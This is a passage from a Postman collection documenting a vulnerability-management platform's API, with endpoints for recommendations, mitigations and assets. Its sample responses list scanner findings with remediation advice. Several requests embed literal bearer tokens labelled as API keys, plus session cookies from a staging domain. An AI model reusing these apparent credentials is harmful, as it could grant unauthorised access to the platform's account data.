later.\",\"recommendation_id\":\"5d024cf1c569d5025016dc54\"},{\"title\":\"POP3 Cleartext Logins Permitted\",\"description\":\"\\nContact your vendor for a fix or encrypt traffic with SSL / TLS using stunnel.\",\"recommendation_id\":\"5d024cf1c569d5025016dc51\"},{\"title\":\"OpenSSL 0.9.8 < 0.9.8za Multiple Vulnerabilities\",\"description\":\"\\nUpgrade to OpenSSL 0.9.8za or later.\",\"recommendation_id\":\"5d024cf1c569d5025016dc4f\"},{\"title\":\"IPSEC Internet Key Exchange (IKE) Version 1 Detection\",\"description\":\"\\nIf this service is not needed, disable it or filter incoming traffic to this port.\",\"recommendation_id\":\"5d024cf1c569d5025016dc4c\"},{\"title\":\"POP Server Detection\",\"description\":\"\\nDisable this service if you do not use it.\",\"recommendation_id\":\"5d024cf1c569d5025016dc4a\"},{\"title\":\"SSL 64-bit Block Size Cipher Suites Supported (SWEET32)\",\"description\":\"\\nReconfigure the affected application, if possible, to avoid use of all 64-bit block ciphers. Alternatively, place limitations on the number of requests that are allowed to be processed over the same TLS connection to mitigate this vulnerability.\",\"recommendation_id\":\"5d024cf1c569d5025016dc47\"},{\"title\":\"OpenSSL 0.9.8 < 0.9.8zg Multiple Vulnerabilities\",\"description\":\"\\nUpgrade to OpenSSL 0.9.8gz or later.\",\"recommendation_id\":\"5d024cf1c569d5025016dc45\"},{\"title\":\"Apache 2.2.x < 2.2.15 Multiple Vulnerabilities\",\"description\":\"\\nUpgrade to Apache version 2.2.15 or later.\",\"recommendation_id\":\"5d024cf1c569d5025016dc41\"},{\"title\":\"TLS Padding Oracle Information Disclosure Vulnerability (TLS POODLE)\",\"description\":\"\\nContact the vendor for an update.\",\"recommendation_id\":\"5d024cf1c569d5025016dc3e\"},{\"title\":\"Web Server SSL Port HTTP Traffic Detection\",\"description\":\"\\nEnable SSL tests in the 'Services' preference setting, or increase the timeouts if this option is already set and the plugin missed this port.\",\"recommendation_id\":\"5cec2425c569d52c0f2e77a1\"},{\"title\":\"SMB Signing not required\",\"description\":\"\\nEnforce message signing in the host's configuration. On Windows, this is found in the policy setting 'Microsoft network server: Digitally sign communications (always)'. On Samba, the setting is called 'server signing'. See the 'see also' links for further details.\",\"recommendation_id\":\"5cec241dc569d52c0f2e73b8\"},{\"title\":\"JBoss Enterprise Application Platform '/web-console' Authentication Bypass\",\"description\":\"\\nUpgrade to JBoss EAP version 4.2.0.CP09 / 4.3.0.CP08 or later.\",\"recommendation_id\":\"5cec2419c569d52c0f2e73b7\"},{\"title\":\"Java JMX Agent Insecure Configuration\",\"description\":\"\\nEnable SSL client or password authentication for the JMX agent.\",\"recommendation_id\":\"5cec240ac569d52c0f2e6be6\"},{\"title\":\"JBoss Enterprise Application Platform (EAP) Status Servlet Request Remote Information Disclosure\",\"description\":\"\\nUpgrade to JBoss EAP version 4.2.0.CP09 / 4.3.0.CP08.\",\"recommendation_id\":\"5cec2405c569d52c0f2e6be5\"},{\"title\":\"Web Server HTTP Header Internal IP Disclosure\",\"description\":\"\\nApply configuration suggested by vendor.\",\"recommendation_id\":\"5cec23f5c569d52c0f2e6414\"},{\"title\":\"JBoss JMX Console Unrestricted Access\",\"description\":\"\\nSecure or remove access to the JMX and/or Web Console using the advanced installer options.\",\"recommendation_id\":\"5cec23f3c569d52c0f2e6413\"},{\"title\":\"Authentication Failure - Local Checks Not Run\",\"description\":\"\\nAddress the problem(s) so that local security checks are enabled.\",\"recommendation_id\":\"5cec23f1c569d52c0f2e6412\"},{\"title\":\"TLS Version 1.1 Protocol Detection\",\"description\":\"\\nEnable support for TLS 1.2 and/or 1.3, and disable support for TLS 1.1.\",\"recommendation_id\":\"5cec23f1c569d52c0f2e6411\"}],\"pageable\":{\"sort\":{\"sorted\":true,\"unsorted\":false},\"pageSize\":30,\"pageNumber\":0,\"offset\":0,\"paged\":true,\"unpaged\":false},\"totalPages\":56,\"totalElements\":1663,\"last\":false,\"first\":true,\"sort\":{\"sorted\":true,\"unsorted\":false},\"numberOfElements\":30,\"size\":30,\"number\":0}"}],"_postman_id":"1b686143-7561-46c9-bb5f-90cac5ff1883"},{"name":"Recommendation by ID","id":"f87d2dfb-4398-49f0-8394-8b414b4ab3bd","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463","description":"<p>Your API Key.</p>\n"}],"url":"https://<instance>/api/v1/knowledge-base/recommendations/<recommendation_id>","description":"<p>This endpoint allows you to retrieve a single Recommendation, specifying its ID. If there is no active Recommendation with the specified ID, the server will respond with a 204: No Content.</p>\n","urlObject":{"protocol":"https","path":["api","v1","knowledge-base","recommendations","<recommendation_id>"],"host":["<instance>"],"query":[],"variable":[]}},"response":[{"id":"9d2155ac-ec95-47d9-9d5b-e5e1b4035016","name":"Try to get a wrong Recommendation","originalRequest":{"method":"GET","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463","description":"Your API Key."}],"url":"https://instance/api/v1/knowledge-base/recommendations/5d024cf3c569d50000000000"},"status":"No Content","code":204,"_postman_previewlanguage":"json","header":[{"key":"Connection","value":"keep-alive","name":"Connection","description":"Options that are desired for the connection"},{"key":"Content-Type","value":"application/json;charset=utf-8","name":"Content-Type","description":"The mime type of this content"},{"key":"Date","value":"Wed, 19 Jun 2019 13:55:02 GMT","name":"Date","description":"The date and time that the message was sent"},{"key":"Expires","value":"Thu, 01 Jan 1970 00:00:00 GMT","name":"Expires","description":"Gives the date/time after which the response is considered stale"},{"key":"Server","value":"nginx","name":"Server","description":"A name for the server"},{"key":"Set-Cookie","value":"JSESSIONID=node01csgo3e7iagt6ghft17vedykg10053.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"JSESSIONID=node05y9d9a14d2iv376is3e2ngp610055.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"XSRF-TOKEN=1437469a-4fe9-4747-900d-19ededa9177e;Path=/","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Strict-Transport-Security","value":"max-age=63072000; includeSubdomains","name":"Strict-Transport-Security","description":"A HSTS Policy informing the HTTP client how long to cache the HTTPS only policy and whether this applies to subdomains."},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Frame-Options","value":"SAMEORIGIN","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-Frame-Options","value":"DENY","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"}],"cookie":[{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":true,"value":"node05y9d9a14d2iv376is3e2ngp610055.node0","key":"JSESSIONID"},{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":false,"value":"1437469a-4fe9-4747-900d-19ededa9177e","key":"XSRF-TOKEN"}],"responseTime":null,"body":""},{"id":"b77d9b92-71cc-4d9e-b4a4-708dff0172df","name":"Get a Recommendation","originalRequest":{"method":"GET","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463","description":"Your API Key."}],"url":"https://instance/api/v1/knowledge-base/recommendations/5d024cf3c569d5025016dcbb"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Connection","value":"keep-alive","name":"Connection","description":"Options that are desired for the connection"},{"key":"Content-Encoding","value":"gzip","name":"Content-Encoding","description":"The type of encoding used on the data."},{"key":"Content-Type","value":"application/json;charset=utf-8","name":"Content-Type","description":"The mime type of this content"},{"key":"Date","value":"Wed, 19 Jun 2019 13:54:05 GMT","name":"Date","description":"The date and time that the message was sent"},{"key":"Expires","value":"Thu, 01 Jan 1970 00:00:00 GMT","name":"Expires","description":"Gives the date/time after which the response is considered stale"},{"key":"Server","value":"nginx","name":"Server","description":"A name for the server"},{"key":"Set-Cookie","value":"JSESSIONID=node012q2m8433yf3ddk881krjup5g10051.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"JSESSIONID=node01csgo3e7iagt6ghft17vedykg10053.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"XSRF-TOKEN=059dfd62-1ac3-4d80-a0ea-1b08b8d98df4;Path=/","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Strict-Transport-Security","value":"max-age=63072000; includeSubdomains","name":"Strict-Transport-Security","description":"A HSTS Policy informing the HTTP client how long to cache the HTTPS only policy and whether this applies to subdomains."},{"key":"Transfer-Encoding","value":"chunked","name":"Transfer-Encoding","description":"The form of encoding used to safely transfer the entity to the user. Currently defined methods are: chunked, compress, deflate, gzip, identity."},{"key":"Vary","value":"Accept-Encoding, User-Agent","name":"Vary","description":"Tells downstream proxies how to match future request headers to decide whether the cached response can be used rather than requesting a fresh one from the origin server."},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Frame-Options","value":"SAMEORIGIN","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-Frame-Options","value":"DENY","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"}],"cookie":[{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":true,"value":"node01csgo3e7iagt6ghft17vedykg10053.node0","key":"JSESSIONID"},{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":false,"value":"059dfd62-1ac3-4d80-a0ea-1b08b8d98df4","key":"XSRF-TOKEN"}],"responseTime":null,"body":"{\"title\":\"MS15-034: Vulnerability in HTTP.sys Could Allow Remote Code Execution (3042553) (uncredentialed check)\",\"description\":\"\\nMicrosoft has released a set of patches for Windows 7, 2008 R2, 8, 8.1, 2012, and 2012 R2\",\"recommendation_id\":\"5d024cf3c569d5025016dcbb\"}"}],"_postman_id":"f87d2dfb-4398-49f0-8394-8b414b4ab3bd"}],"id":"5b300b20-6d80-4516-99d5-ea94943728ef","_postman_id":"5b300b20-6d80-4516-99d5-ea94943728ef","description":""},{"name":"Mitigações","item":[{"name":"Mitigations","id":"12aa3d29-ee8c-4d5c-ac5d-36893039ddcc","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463","description":"<p>Your API Key.</p>\n"}],"url":"https://<instance>/api/v1/knowledge-base/mitigations?size=30&page=0","description":"<p>This endpoint allows you to retrieve the active Mitigations on the database. It uses pagination, with parameters <strong>size</strong> and <strong>page</strong>. If none is specified, <strong>size</strong> will be 30 and <strong>page</strong> will be 0 by default. You can retrieve at most 200 records at once. If there are more than 200 Mitigations on the Database, you will need to get the remainder ones specifying the next <strong>pages</strong>.</p>\n","urlObject":{"protocol":"https","path":["api","v1","knowledge-base","mitigations"],"host":["<instance>"],"query":[{"description":{"content":"<p>[optional] How many results you want. Default is 30. Max is 200.</p>\n","type":"text/plain"},"key":"size","value":"30"},{"description":{"content":"<p>[optional] Which page you want to retrieve.</p>\n","type":"text/plain"},"key":"page","value":"0"}],"variable":[]}},"response":[{"id":"3a142118-6592-42c9-9f73-bd980a012054","name":"Get the first 30 Mitigations","originalRequest":{"method":"GET","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463","description":"Your API Key."}],"url":{"raw":"https://instance/api/v1/knowledge-base/mitigations?size=30&page=0","protocol":"https","host":["instance"],"path":["api","v1","knowledge-base","mitigations"],"query":[{"key":"size","value":"30","description":"[optional] How many results you want. Default is 30. Max is 200."},{"key":"page","value":"0","description":"[optional] Which page you want to retrieve."}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Connection","value":"keep-alive","name":"Connection","description":"Options that are desired for the connection"},{"key":"Content-Encoding","value":"gzip","name":"Content-Encoding","description":"The type of encoding used on the data."},{"key":"Content-Type","value":"application/json;charset=utf-8","name":"Content-Type","description":"The mime type of this content"},{"key":"Date","value":"Wed, 19 Jun 2019 13:46:29 GMT","name":"Date","description":"The date and time that the message was sent"},{"key":"Expires","value":"Thu, 01 Jan 1970 00:00:00 GMT","name":"Expires","description":"Gives the date/time after which the response is considered stale"},{"key":"Server","value":"nginx","name":"Server","description":"A name for the server"},{"key":"Set-Cookie","value":"JSESSIONID=node01nlxggdkkpi9wv0z946qohf4110038.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"JSESSIONID=node01hmn39s2jlo3by5ui83m3n69m10040.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"XSRF-TOKEN=20ab8b5c-705e-47af-a28c-14069e9974d5;Path=/","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Strict-Transport-Security","value":"max-age=63072000; includeSubdomains","name":"Strict-Transport-Security","description":"A HSTS Policy informing the HTTP client how long to cache the HTTPS only policy and whether this applies to subdomains."},{"key":"Transfer-Encoding","value":"chunked","name":"Transfer-Encoding","description":"The form of encoding used to safely transfer the entity to the user. Currently defined methods are: chunked, compress, deflate, gzip, identity."},{"key":"Vary","value":"Accept-Encoding, User-Agent","name":"Vary","description":"Tells downstream proxies how to match future request headers to decide whether the cached response can be used rather than requesting a fresh one from the origin server."},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Frame-Options","value":"SAMEORIGIN","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-Frame-Options","value":"DENY","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"}],"cookie":[{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":true,"value":"node01hmn39s2jlo3by5ui83m3n69m10040.node0","key":"JSESSIONID"},{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":false,"value":"20ab8b5c-705e-47af-a28c-14069e9974d5","key":"XSRF-TOKEN"}],"responseTime":null,"body":"{\"content\":[{\"title\":\"Install a Web Application Firewall\",\"description\":\"Install a Web Application Firewall\",\"mitigation_id\":\"5cad0edec569d524a08f6d0d\"}],\"pageable\":{\"sort\":{\"sorted\":true,\"unsorted\":false},\"pageSize\":30,\"pageNumber\":0,\"offset\":0,\"paged\":true,\"unpaged\":false},\"totalPages\":1,\"totalElements\":1,\"last\":true,\"first\":true,\"sort\":{\"sorted\":true,\"unsorted\":false},\"numberOfElements\":1,\"size\":30,\"number\":0}"}],"_postman_id":"12aa3d29-ee8c-4d5c-ac5d-36893039ddcc"},{"name":"Mitigations by ID","id":"4751bac9-94c0-42a1-a2d5-ceeec3ea75ab","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463","description":"<p>Your API Key.</p>\n"}],"url":"https://<instance>/api/v1/knowledge-base/mitigations/<mitigation_id>","description":"<p>This endpoint allows you to retrieve a single Mitigation, specifying its ID. If there is no active Mitigation with the specified ID, the server will respond with a 204: No Content.</p>\n","urlObject":{"protocol":"https","path":["api","v1","knowledge-base","mitigations","<mitigation_id>"],"host":["<instance>"],"query":[],"variable":[]}},"response":[{"id":"9f9ad02b-0303-483f-821a-a5965b2cb866","name":"Try to get a wrong Mitigation","originalRequest":{"method":"GET","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463","description":"Your API Key."}],"url":"https://instance/api/v1/knowledge-base/mitigations/5cad0edec569d52000000000"},"status":"No Content","code":204,"_postman_previewlanguage":"json","header":[{"key":"Connection","value":"keep-alive","name":"Connection","description":"Options that are desired for the connection"},{"key":"Content-Type","value":"application/json;charset=utf-8","name":"Content-Type","description":"The mime type of this content"},{"key":"Date","value":"Wed, 19 Jun 2019 13:49:22 GMT","name":"Date","description":"The date and time that the message was sent"},{"key":"Expires","value":"Thu, 01 Jan 1970 00:00:00 GMT","name":"Expires","description":"Gives the date/time after which the response is considered stale"},{"key":"Server","value":"nginx","name":"Server","description":"A name for the server"},{"key":"Set-Cookie","value":"JSESSIONID=node014jzaeet5b2181kpwwchb7076h10043.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"JSESSIONID=node013sbjcm39yzdv10t5hm47jebr510045.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"XSRF-TOKEN=2e4256f1-976d-4e45-8c64-5dea8a29e3fd;Path=/","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Strict-Transport-Security","value":"max-age=63072000; includeSubdomains","name":"Strict-Transport-Security","description":"A HSTS Policy informing the HTTP client how long to cache the HTTPS only policy and whether this applies to subdomains."},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Frame-Options","value":"SAMEORIGIN","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-Frame-Options","value":"DENY","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"}],"cookie":[{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":true,"value":"node013sbjcm39yzdv10t5hm47jebr510045.node0","key":"JSESSIONID"},{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":false,"value":"2e4256f1-976d-4e45-8c64-5dea8a29e3fd","key":"XSRF-TOKEN"}],"responseTime":null,"body":""},{"id":"773bec00-c4fc-44ca-b674-251fd98a4662","name":"Get a Mitigation","originalRequest":{"method":"GET","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463","description":"Your API Key."}],"url":"https://instance/api/v1/knowledge-base/mitigations/5cad0edec569d524a08f6d0d"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Connection","value":"keep-alive","name":"Connection","description":"Options that are desired for the connection"},{"key":"Content-Encoding","value":"gzip","name":"Content-Encoding","description":"The type of encoding used on the data."},{"key":"Content-Type","value":"application/json;charset=utf-8","name":"Content-Type","description":"The mime type of this content"},{"key":"Date","value":"Wed, 19 Jun 2019 13:48:28 GMT","name":"Date","description":"The date and time that the message was sent"},{"key":"Expires","value":"Thu, 01 Jan 1970 00:00:00 GMT","name":"Expires","description":"Gives the date/time after which the response is considered stale"},{"key":"Server","value":"nginx","name":"Server","description":"A name for the server"},{"key":"Set-Cookie","value":"JSESSIONID=node01hmn39s2jlo3by5ui83m3n69m10040.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"JSESSIONID=node014jzaeet5b2181kpwwchb7076h10043.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"XSRF-TOKEN=12e874e7-55b4-4282-8faa-5937bca2c0df;Path=/","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Strict-Transport-Security","value":"max-age=63072000; includeSubdomains","name":"Strict-Transport-Security","description":"A HSTS Policy informing the HTTP client how long to cache the HTTPS only policy and whether this applies to subdomains."},{"key":"Transfer-Encoding","value":"chunked","name":"Transfer-Encoding","description":"The form of encoding used to safely transfer the entity to the user. Currently defined methods are: chunked, compress, deflate, gzip, identity."},{"key":"Vary","value":"Accept-Encoding, User-Agent","name":"Vary","description":"Tells downstream proxies how to match future request headers to decide whether the cached response can be used rather than requesting a fresh one from the origin server."},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Frame-Options","value":"SAMEORIGIN","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-Frame-Options","value":"DENY","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"}],"cookie":[{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":true,"value":"node014jzaeet5b2181kpwwchb7076h10043.node0","key":"JSESSIONID"},{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":false,"value":"12e874e7-55b4-4282-8faa-5937bca2c0df","key":"XSRF-TOKEN"}],"responseTime":null,"body":"{\"title\":\"Install a Web Application Firewall\",\"description\":\"Install a Web Application Firewall\",\"mitigation_id\":\"5cad0edec569d524a08f6d0d\"}"}],"_postman_id":"4751bac9-94c0-42a1-a2d5-ceeec3ea75ab"}],"id":"cca46105-44c0-4bcb-90ca-598b6ec874a4","_postman_id":"cca46105-44c0-4bcb-90ca-598b6ec874a4","description":""}],"id":"32266cf3-7827-4332-90d6-da9f260b1085","_postman_id":"32266cf3-7827-4332-90d6-da9f260b1085","description":""},{"name":"v2.0","item":[{"name":"Ativos","item":[{"name":"Assets","id":"b8983ed4-d4ba-41d1-ade1-2ef4b36198f1","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer 1b47827e-d452-40b2-9d1a-abae333315b8"}],"url":"https://<instance>/api/v2/assets?size=30&page=0","description":"<p>Esse <em>endpoint</em> permite recuperar os Ativos cadastrados. Utiliza-se paginação com os parâmetros <strong>size</strong> e <strong>page</strong>. Se os parâmetros não forem especificados, <strong>size</strong> será 30 e <strong>page</strong> será 0 por padrão.</p>\n","auth":{"type":"bearer","bearer":{"basicConfig":[{"key":"token","value":"<token>"}]},"isInherited":true,"source":{"_postman_id":"b151743b-05fe-4f8a-8774-bb0f78ea3db6","id":"b151743b-05fe-4f8a-8774-bb0f78ea3db6","name":"Ativos","type":"folder"}},"urlObject":{"protocol":"https","path":["api","v2","assets"],"host":["<instance>"],"query":[{"description":{"content":"<p>[opcional] Quantos Ativos por página. Por padrão é 30. O número máximo é 200.</p>\n","type":"text/plain"},"key":"size","value":"30"},{"description":{"content":"<p>[opcional] Qual página buscar.</p>\n","type":"text/plain"},"key":"page","value":"0"}],"variable":[]}},"response":[{"id":"9afd5162-9b73-4b42-a3f9-e6f1de1c4a93","name":"Retrieve the first 10 Assets","originalRequest":{"method":"GET","header":[{"key":"Content-Type","type":"text","name":"Content-Type","value":"application/x-www-form-urlencoded"},{"key":"Accept","value":"application/json","warning":""},{"key":"Authorization","value":"Bearer 1b47827e-d452-40b2-9d1a-abae333315b8","description":"Your API Key.","warning":"This is a duplicate header and will be overridden by the Authorization header generated by Postman."}],"url":{"raw":"https://subdomain.gat.digital/api/v2/assets?size=10&page=0","protocol":"https","host":["subdomain","gat","digital"],"path":["api","v2","assets"],"query":[{"key":"size","value":"10","description":"[optional] How many results you want. Default is 30. Max is 200"},{"key":"page","value":"0","description":"[optional] Which page you want to retrieve"}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Connection","value":"keep-alive","name":"Connection","description":"Options that are desired for the connection"},{"key":"Content-Encoding","value":"gzip","name":"Content-Encoding","description":"The type of encoding used on the data."},{"key":"Content-Type","value":"application/json;charset=utf-8","name":"Content-Type","description":"The mime type of this content"},{"key":"Date","value":"Fri, 14 Jun 2019 16:05:27 GMT","name":"Date","description":"The date and time that the message was sent"},{"key":"Expires","value":"Thu, 01 Jan 1970 00:00:00 GMT","name":"Expires","description":"Gives the date/time after which the response is considered stale"},{"key":"Server","value":"nginx","name":"Server","description":"A name for the server"},{"key":"Set-Cookie","value":"JSESSIONID=node01mccbd4fdst6wufx0io4y0s2404.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"XSRF-TOKEN=55aa86c8-5ba6-44d5-9f30-70e33ca9df0c;Path=/","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Strict-Transport-Security","value":"max-age=63072000; includeSubdomains","name":"Strict-Transport-Security","description":"A HSTS Policy informing the HTTP client how long to cache the HTTPS only policy and whether this applies to subdomains."},{"key":"Transfer-Encoding","value":"chunked","name":"Transfer-Encoding","description":"The form of encoding used to safely transfer the entity to the user. Currently defined methods are: chunked, compress, deflate, gzip, identity."},{"key":"Vary","value":"Accept-Encoding, User-Agent","name":"Vary","description":"Tells downstream proxies how to match future request headers to decide whether the cached response can be used rather than requesting a fresh one from the origin server."},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Frame-Options","value":"SAMEORIGIN","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-Frame-Options","value":"DENY","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"}],"cookie":[{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":true,"value":"node01mccbd4fdst6wufx0io4y0s2404.node0","key":"JSESSIONID"},{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":false,"value":"55aa86c8-5ba6-44d5-9f30-70e33ca9df0c","key":"XSRF-TOKEN"}],"responseTime":null,"body":"{\n    \"content\": [\n        {\n            \"hostname\": \"ec2-192-168-79-154.sa-east-1.compute.amazonaws.com\",\n            \"type\": \"HOST\",\n            \"severity\": 0,\n            \"asset_id\": \"5d03b90cc569d5025016e4d5\",\n            \"host_ip\": \"192.168.79.154\",\n            \"host_os\": \"Linux Kernel 3.13 on Ubuntu 14.04 (trusty)\"\n        },\n        {\n            \"hostname\": \"ec2-192-168-217-192.sa-east-1.compute.amazonaws.com\",\n            \"type\": \"HOST\",\n            \"severity\": 0,\n            \"asset_id\": 